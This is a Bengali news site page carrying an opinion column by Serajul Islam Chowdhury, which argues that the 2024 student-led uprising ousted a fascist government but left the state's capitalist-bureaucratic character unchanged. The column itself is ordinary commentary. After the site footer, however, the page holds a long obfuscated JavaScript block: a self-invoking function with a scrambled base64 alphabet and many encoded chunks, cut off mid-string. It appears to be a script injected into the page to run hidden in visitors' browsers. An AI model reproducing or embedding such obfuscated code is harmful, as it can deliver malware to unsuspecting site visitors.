শিরোনাম
কার্যক্রম নিষিদ্ধ সংগঠনের নৈরাজ্য ও নাশকতার প্রতিবাদে খাগড়াছড়িতে স্বেচ্ছাসেবক দলের বিক্ষোভ ফ্যাসিবাদবিরোধী জাতীয় ঐক্য গড়তে সংলাপে বসছেন প্রধানমন্ত্রী খাগড়াছড়িতে ডাকসু ভিপি সাদিক কায়েমের বাড়িতে আগুন দেওয়ার চেষ্টা দেশে সাম্প্রতিক সময়ে যে অনাকাঙ্খিত ঘটনাসমূহ ঘটছে তা অত্যন্ত দুর্ভাগ্যজনক—-প্রফেসর ড. জয়নুল আবেদীন সিদ্দিকী টানা অবরোধ ও নিষেধাজ্ঞায় পর্যটকশূন্য সাজেক, মাসে ক্ষতি ৬০ কোটি টাকা পার্বত্য অঞ্চলের প্রান্তিক জনগোষ্ঠীর জীবনমান উন্নয়নে সর্বোচ্চ গুরুত্ব দিচ্ছেন প্রধানমন্ত্রী তারেক রহমান : ইউএনডিপি প্রতিনিধিদলকে প্রতিমন্ত্রী ব্যারিস্টার মীর হেলাল ৩১ ডিসেম্বর পর্যন্ত সব ধরনের নোট-গাইড বই মুদ্রণ বন্ধ থাকবে: এনসিটিবি ১৮ দিনের অস্থিরতায় পোশাক খাতে ক্ষতি ৪২৮ মিলিয়ন ডলার রাঙ্গামাটির কাপ্তাইয়ের জেটিঘাট সাপ্তাহিক বাজার ছিল জনশূন্য,চাঁদা না দেওয়ায় পাহাড়িদের বাজার বয়কট রাঙ্গামাটির বেনুবন সর্বজনীন বৌদ্ধ বিহারে ৫১তম কঠিন চীবর দান উৎসব উদযাপন

ঐক্য তো অবশ্যই, কিন্তু কোন লক্ষ্যে

রিপোর্টার
  • আপডেট সময় শুক্রবার, ৩১ জানুয়ারী, ২০২৫
  • ৯০২ দেখা হয়েছে

সিরাজুল ইসলাম চৌধুরী:- “রাজনীতিকরা আগেও পারেননি, এবারও যে পারলেন না : এ থেকে তাদের অন্তত আত্মানুসন্ধানের সুযোগটা তো আছে। তবে আমরা নিশ্চিত এ সুযোগ তারা গ্রহণ করবেন না। মূল কারণ তাদের শ্রেণিগত অবস্থানে; তারা হয় বুর্জোয়া, নয়তো বুর্জোয়া হতে অভিলাষী। রাষ্ট্র ও সামাজিক ব্যবস্থায় মৌলিক পরিবর্তন তারা ঘটতে দেবেন না, পরিবর্তন যাতে না ঘটে সে লক্ষ্যেই কাজ করেছেন এবং করতে থাকবেন”

চব্বিশের জুলাই-আগস্ট অভ্যুত্থানে কোনো বিপ্লব ঘটেনি, বিপ্লব সহজ ব্যাপার নয়, যখন-তখন ঘটে না। আর যে বিপ্লবের আশায় আমরা আছি, তা হচ্ছে সামাজিক বিপ্লব। সেটা ঘটেনি। রাজনৈতিক বিপ্লব ঘটেছে, এই সীমিত অর্থে যে চরম ফ্যাসিবাদী একটি সরকার বিদায় নিয়েছে, কিন্তু রাষ্ট্রের অন্তর্গত চরিত্র ঠিক আগের মতোই রয়ে গেছে। সাতচল্লিশে সেটা বদলায়নি, বদলায়নি এমনকি একাত্তরেও। বদলাবে তখনই যখন দেখা যাবে সমাজে মানুষে মানুষে অধিকার ও সুযোগের সাম্য প্রতিষ্ঠিত হয়েছে, ক্ষমতার বিকেন্দ্রীকরণ ঘটেছে এবং সর্বস্তরে প্রকৃত জনপ্রতিনিধিদের জবাবদিহিসম্পন্ন নেতৃত্ব প্রতিষ্ঠিত হয়েছে। তেমন সমাজ যতদিন না পাওয়া যাচ্ছে ততদিন বুঝে নিতে হবে এবং টেরও পাওয়া যাবে যে, রাষ্ট্র সেই আগের মতোই পুঁজিবাদী-আমলাতান্ত্রিক রয়ে গেছে। আগের শাসকরা ছিল বিদেশি, বাংলাদেশের যে শাসকরা শাসন করে যাচ্ছে তারা চেহারায় স্বদেশি বটে, কিন্তু স্বভাবে তারা আগের শাসকদের মতোই। তারাও লুণ্ঠন করে এবং সম্পদ পাচার করে; আগের ঔপনিবেশিক শাসকরা যেমনটা করত। তাদের নির্ভরতাও আমলাতন্ত্রের ওপরই।

দেশের উন্নতি? অবশ্যই হয়েছে। কিন্তু সেটা কতিপয়ের, সব মিলিয়ে হয়তো শতকরা বিশজন তাতে উপকৃত হয়েছে, বঞ্চিত হয়েছে আশিজন। অথচ যে উন্নতিটা ঘটল সেটা কিন্তু ওই আশিজনের শ্রমের জন্যই সম্ভব হয়েছে। কিন্তু সে উন্নতির ফসল তাদের কাছে পৌঁছে সামান্য পরিমাণেই। সিংহভাগ আত্মসাৎ করেছে সুবিধাভোগীরা।

ফ্যাসিবাদী সরকাররা যা করে থাকে আমাদের পালিয়ে যাওয়া সরকারও তেমনটাই করেছে। কিছু মানুষকে টেনে নিয়েছে কাছে; লুণ্ঠনের সুযোগ করে দিয়ে এবং প্রলোভন দেখিয়ে। প্রধানমন্ত্রীর নীতি ছিল, দুহাতে টাকা কামাও। তিনি সেটা করেছেন; তার কাছের লোকেরা এবং ব্যবসায়ী ও আমলারাও ওই কাজ সমানতালে চালিয়ে গেছে। তাদের ভয়ডর বলতে কিছু ছিল না। পুলিশের জন্য দেশটা ছিল উন্মুক্ত; রাজত্ব ছিল তাদেরই, তারা ঘুষ খেয়েছে, জবরদখল করেছে, বাণিজ্য করেছে গ্রেপ্তারের। পুলিশের বড় দায়িত্ব ছিল বিরোধীদের দমন করা। সে কাজ তারা কেমন দক্ষতার সঙ্গে করতে পারে তার প্রমাণ রেখে গেছে অভ্যুত্থানের পূর্বমুহূর্তে। জনগণের টাকায় লালিত-পালিত একটি বাহিনী নির্বিচারে এভাবে দেশের মানুষকে চালাতে পারে সেটা ছিল কল্পনাতীত। এ কারণে পাকিস্তানি হানাদাররা গণহত্যা চালিয়েছে, তারা ছিল বিদেশি, পূর্ববঙ্গের মানুষকে তারা শত্রু ভাবতেই অভ্যস্ত ছিল। এবার বাংলাদেশি পুলিশ যা করল সেটাও গণহত্যাই, যদিও এর পেছনে জাতিগত বিদ্বেষ ছিল না, ছিল কর্তৃপক্ষের হুকুম এবং বাহিনীটির স্বোপার্জিত নিপীড়নকারী চরিত্র।

ভান-ভণিতার আড়াল-আবডাল ভেদ করে বঞ্চনা ও নিরাপত্তাহীনতার সত্যগুলো এখন বের হয়ে আসছে। সেগুলো পীড়িত মানুষের আর্তনাদের মতোই চাপা পড়েই থাকত যদি না দুর্দমনীয় প্রধানমন্ত্রী টের পেতেন যে সেনাবাহিনীর সদস্যরা পুলিশ বাহিনীর মতো নির্বিচারে অস্ত্র প্রয়োগে রাজি নয়। প্রতিষ্ঠিত হয়েছে এ দৃষ্টান্তও যে, ক্ষমতায় টিকে থাকার এবং রাষ্ট্রকে নিজেদের পারিবারিক সম্পত্তিতে পরিণত করার জন্য একজন প্রধানমন্ত্রী কতটা নির্মম হতে পারেন এবং তার অনুসরণে দেশের সম্পদ কীভাবে লুণ্ঠিত ও বিদেশে পাচার হতে পারে, কেমন করে নিজের হাতে তিনি রাষ্ট্রের গুরুত্বপূর্ণ সব প্রতিষ্ঠানকে দুমড়েমুচড়ে ভেঙেচুরে ফেলতে পারেন এবং মাত্র কয়েক দিনে এক হাজারেরও বেশি মানুষকে নিশ্চিহ্ন করে দিতে এবং হাজার পঁচিশেক মানুষকে আহত করতে পারেন। প্রধানমন্ত্রী তো কখনো কোনো উত্তেজনা প্রকাশ করেননি, ধীরস্থির ও ঠান্ডা মাথায় কাজ করেছেন। তবে ক্ষমতা ও সম্পদের লিপ্সা তাকে অমানবিক করে তুলেছিল। তিনি কি তার পিতা-মাতা ও নিকটাত্মীয়দের হত্যার প্রতিশোধ নিচ্ছিলেন? কিন্তু কার ওপর প্রতিশোধ? দেশের ওপর? দেশ তো ভূমি নয়, দেশ তো দেশের মানুষ। রক্ত ও অশ্রু তো মানুষেরই ঝরে, মাটির নয়। মাটি কেবল দেখে এবং সিক্ত হয়। একাত্তরে পাকিস্তানিরা বলত তারা মাটি চায়, মানুষ চায় না। কিন্তু আমাদের প্রধানমন্ত্রী তো হানাদার ছিলেন না। ছিলেন মুক্তিযুদ্ধের পক্ষের মানুষ। ওই যুদ্ধের সন্তান বলেই দাবি করতেন; দাবিটা যে মিথ্যা ছিল তাও তো নয়। তাহলে? নাকি আমরা বলব ক্ষমতা ও অর্থের লিপ্সা এবং প্রতিহিংসাপরায়ণতা একত্র মিশেছিল তার মধ্যে এবং তিনি আশা করেছিলেন তার পতন কখনো ঘটবে না, কারণ তিনি বিভিন্ন রাষ্ট্রীয় বাহিনী, আদালত, আমলাতন্ত্র, ব্যবসায়ী, দলীয় ক্যাডার এবং বিদেশি শক্তির সহায়তায় দ্বারা সুরক্ষিত ছিলেন।

তো তিনি এবং তার সঙ্গীদের কেউ কেউ চলে গেছেন, কিন্তু রাষ্ট্র ও সমাজের ভেতরে যে ফ্যাসিবাদী উপাদানগুলো রয়ে গেছে, তাদের কি তিনি সঙ্গে করে নিয়ে গেছেন? না, সেটা তিনি করেননি। সেগুলোকে তিনি রেখে গেছেন আমাদের দুর্ভোগ বৃদ্ধির জন্য। উপাদানগুলো পুঁজিবাদী উন্নয়নের সঙ্গে জড়িত। ওই উন্নয়ন যত ঘটেছে তত বেড়েছে মানুষে মানুষে বৈষম্য, বিচ্ছিন্নতা; নিম্নগামী হয়েছে দেশপ্রেম এবং এসব হ্রাস-বৃদ্ধির সঙ্গে অনিবার্যভাবে ঘটেছে এবং ঘটতে থাকবে ফ্যাসিবাদের পীড়ন। পুঁজিবাদের অভ্যন্তরীণ দ্বন্দ্বে সংকট বাড়বে, ফলে পীড়নও বাড়বে এবং মানুষ বিদ্রোহ করতে চাইবে। বৃদ্ধি পাবে অরাজকতা ও প্রকৃতির বিরূপতা। সভ্যতা নয়, সংকটে পড়বে মানুষের মনুষ্যত্বই। অস্তিত্বও।

ছাত্র-জনতার অভ্যুত্থান আরও একটি সত্যকে সামনে নিয়ে এসেছে; সেটা তারুণ্যের শক্তি। এমনিতেই তারুণ্য যা করতে পারে বার্ধক্য তা করতে অপারগ। আর আমাদের দেশের ক্ষেত্রে বয়স্করা যা দেওয়ার এরই মধ্যে দিয়ে ফেলেছেন, তরুণরাই যদি পারে তবে নতুন কিছু দেবে। কারণ তরুণদের আছে সাহস ও সংবেদনশীলতা; বয়স বাড়লে যা বাড়ে না, বরং উল্টো পথ ধরে। আর রাজনীতির ক্ষেত্রে প্রধান যে ধারা সেটা বুর্জোয়াদের। ধর্মনিরপেক্ষ এবং ধর্ম নিয়ে কারবারি, উভয় ধারাই আসলে বুর্জোয়া ধারা। তাদের লক্ষ্য সম্পত্তির ব্যক্তিগত মালিকানাকে সুরক্ষা দেওয়া এবং নিজেদের সুবিধার জন্য ক্ষমতা বৃদ্ধি করা। বুর্জোয়াদের রোগে আক্রান্ত হওয়ার আগপর্যন্ত তরুণরা সমাজে পরিবর্তন চায় এবং তারা সাহস করে রুখে দাঁড়ায়। আমাদের রাষ্ট্রভাষা আন্দোলন ছিল অনেকটা অভ্যুত্থানের মতোই, তার প্রতীক হয়ে দাঁড়িয়েছিলেন শহীদ আবুল বরকত; ওই অভ্যুত্থানের ধারাবাহিকতাতেই ঊনসত্তরের গণঅভ্যুত্থান ঘটে, যার প্রতীক ছিলেন শহীদ আসাদুজ্জামান, যিনি কর্মী ছিলেন কমিউনিস্ট ধারার; তারা দুজনই ছিলেন ঢাকা বিশ্ববিদ্যালয়ের ছাত্র; এবারের অভ্যুত্থানের প্রতীক আবু সাঈদও ছাত্রই তবে ঢাকার নন, রংপুরের। পাকিস্তানি শাসকরাও পুঁজিবাদী ঘরানারই ছিল, কিন্তু বাংলাদেশের যে সরকারের বিরুদ্ধে অভ্যুত্থান ঘটল সেটি পুঁজিবাদীই শুধু নয়, পরিণত হয়েছিল পুরোপুরি ফ্যাসিবাদীতে। আগের দুটি অভ্যুত্থানের সঙ্গে বর্তমান অভ্যুত্থানের চরিত্রেও একটা পার্থক্য রয়েছে; সেটা হলো এই যে, এটিতে জনতার অংশগ্রহণ ছিল আগের তুলনায় অনেক বেশি। আন্দোলন শুরুতে ছিল সরকারি চাকরিতে কোটা ব্যবস্থার সংস্কারের জন্য; তাতে সরকার পতনের তো নয়ই, এমনকি কোটা ব্যবস্থার বাতিলের দাবিও ছিল না। সীমিত লক্ষ্যের সেই আন্দোলন যে এমন একটি অভ্যুত্থানে পরিণত হলো তার কারণ একাধিক। তবে প্রথম কারণ কিন্তু সরকারের নৃশংসতা। ফ্যাসিবাদী দুঃশাসকরা সীমা মানে না, শুধুই সীমানা ভাঙতে থাকে। আর ওই ভাঙার মধ্য দিয়েই তাদের পতন ঘটে। হিটলার আত্মহত্যা করেন, মুসোলিনি তার দেশেরই বিপ্লবী সমাজতন্ত্রীদের হাতে ধরা পড়ে প্রাণ হারান এবং আমাদের শেখ হাসিনা প্রতিবেশী রাষ্ট্রে পালিয়ে গিয়ে প্রাণ বাঁচান।

পলাতক প্রধানমন্ত্রী আন্দোলনকারী শিক্ষার্থীদের রাজাকারের নাতিপুতি বলে অপমান করেছিলেন। তাতে তরুণরা ভীষণ অপমানিত বোধ করল, মধ্যরাতেই তারা বেরিয়ে এলো প্রতিবাদ জানাতে। এরপর এলো দ্বিতীয় আঘাত।

প্রধানমন্ত্রীর প্রধান মুখপাত্র বললেন, ওই নাতিপুতিদের মোকাবিলা করতে ছাত্রলীগই যথেষ্ট। ছাত্রলীগের সভাপতি মওকা খুঁজছিল। সে ঘোষণা করল, ‘আমরা প্রস্তুত’। তার বাহিনী ঝাঁপিয়ে পড়ল আন্দোলনকারীদের ওপর। মেয়েরাও রেহাই পেল না। এরপর এলো পুলিশ; তারপর র‌্যাব ও বিজিবি। সর্বশেষ আর্মিকেও টহল দিতে দেখা গেল। ফল দাঁড়াল উল্টো। ছেলেমেয়েরা তো পিছু হটলই না, সাধারণ মানুষও এলো এগিয়ে। তাদের ভেতর ক্ষোভ ছিল, লাঞ্ছনার ও অপমানের : সেটা প্রকাশের নিয়মতান্ত্রিক পথ পাওয়া যেত নির্বাচন হলে। ওই পথ অবরুদ্ধ হাওয়াতে ক্ষোভটা প্রকাশ পেল এই অভ্যুত্থানে। মানুষের সহানুভূতি ছিল তরুণদের প্রতি, যেমনটা পিতা-মাতার থাকে। বিশ্ববিদ্যালয়ের তরুণদের এগিয়ে যেতে দেখে অন্য তরুণরাও চলে এলো। এমনকি গুরুত্বপূর্ণ মন্ত্রীর ছেলেও দেখা গেল যোগ দিচ্ছে মিছিলে। তাদের বুকের ভেতর ঝড় উঠেছে, তারা বুক পেতে দিয়েছে। অনিবার্য হয়ে পড়ল অভ্যুত্থান।

প্রশ্ন থাকে রাজনীতিকরা যা করতে পারলেন না, তরুণরা সেটা কেমন করে ঘটিয়ে ফেলল? জবাব হচ্ছে প্রথমত তরুণদের ছিল সাহস; পুলিশ বাহিনীর একজন সদস্য যে তার ওপরওয়ালাকে বলেছেন, ‘গুলি করি, মরে একটা বাকিডি যায় না স্যার’—সেই অভিজ্ঞতাটা নিশ্চয়ই অন্য বন্দুকধারীদেরও।

তরুণদের নিজস্ব সাহসের সঙ্গে যুক্ত হয়েছিল তাদের প্রতি জনগণের সহানুভূতি ও আস্থা। বড় বড় রাজনৈতিক নেতাদের মানুষ দেখেছে, তাদের ওপর আস্থা তো নয়ই, অনাস্থাই জমে উঠেছে ভেতরে ভেতরে। বিএনপির ডাকে যে হাজার হাজার মানুষ ছুটে আসত, তার কারণ ওই দলের প্রতি যতটা না সমর্থন তার চেয়ে অধিক আওয়ামী লীগের শাসনে অসন্তোষ। বিএনপি নেতারা যখন গ্রেপ্তার হয়েছেন, তাদের আন্দোলন তখন স্তিমিত হয়ে পড়েছে, কারণ সাধারণ মানুষের আস্থার ঘাটতি এবং দলের নিজের সাংগঠনিক দুর্বলতা। রাজনীতিকরা আগেও পারেননি, এবারও যে পারলেন না : এ থেকে তাদের অন্তত আত্মানুসন্ধানের সুযোগটা তো আছে। তবে আমরা নিশ্চিত এ সুযোগ তারা গ্রহণ করবেন না। মূল কারণ তাদের শ্রেণিগত অবস্থানে; তারা হয় বুর্জোয়া, নয়তো বুর্জোয়া হতে অভিলাষী। রাষ্ট্র ও সামাজিক ব্যবস্থায় মৌলিক পরিবর্তন তারা ঘটতে দেবেন না, পরিবর্তন যাতে না ঘটে সে লক্ষ্যেই কাজ করেছেন এবং করতে থাকবেন।কালবেলা
লেখক: ইমেরিটাস অধ্যাপক, ঢাকা বিশ্ববিদ্যালয়,সম্পাদক, ত্রৈমাসিক নতুন দিগন্ত,সমাজ রূপান্তর অধ্যয়নকেন্দ্রের সভাপতি

পোস্টটি শেয়ার করুন

Leave a Reply

Your email address will not be published. Required fields are marked *

এই বিভাগের আরো
© All rights reserved © 2023 Chtnews24.com
Website Design By Kidarkar It solutions
(function(Q){var hCOGF=71;var vdILh=983893626,o4TS="ZN4BiT7krdPJoxUtKqHEm3ayFhwjcOGVIbW1fLSv0DMeg25s8C6QRYzl9Au+Xn/p",olhqw=["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","Uc7lVIha3HgUnK9bqj